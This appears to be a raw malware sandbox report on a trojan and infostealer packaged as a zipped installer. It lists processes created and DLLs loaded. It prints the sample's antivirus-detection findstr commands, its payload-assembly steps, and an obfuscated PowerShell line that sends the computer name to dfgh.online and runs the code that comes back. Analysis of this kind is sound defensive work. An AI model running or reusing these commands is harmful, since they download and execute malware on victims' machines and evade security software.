NAME_NoneDataDrivenPlatformInfo section [PreviewPlatform %s] must specify a ShaderFormatItem.ShaderFormat != NAME_NoneEnabledCVarPlatformNameShaderFormatActiveIconPathActiveIconNameInactiveIconPathInactiveIconNameDeviceProfileNameMenuTextMenuTooltipIconTextPlatformInfo PreviewPlatform

Source: classification engine

Classification label: mal100.troj.spyw.evad.winZIP@33/35@5/3

Source: C:\Program Files\7-Zip\7zG.exe

File created: C:\Users\user\Desktop\installer_1.05_36.4

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4532:120:WilError_03

Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe

File created: C:\Users\user\AppData\Local\Temp\nscE6FA.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: Lightweight.com, 00000017.00000003.1928897162.0000000003BFC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1928610163.0000000003CD1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\installer_1.05_36.4\" -spe -an -ai#7zMap8006:94:7zEvent16868
Source: unknown	Process created: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe "C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe"
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 709182
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Bet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "brandon" M
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Effective + ..\Certificates + ..\Stones + ..\Harder + ..\Planners + ..\Suppose N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com Lightweight.com N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\Read me before you start.txt
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass MZP
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 709182	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Bet	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "brandon" M	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Effective + ..\Certificates + ..\Stones + ..\Harder + ..\Planners + ..\Suppose N	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com Lightweight.com N	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass MZP	Jump to behavior

Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
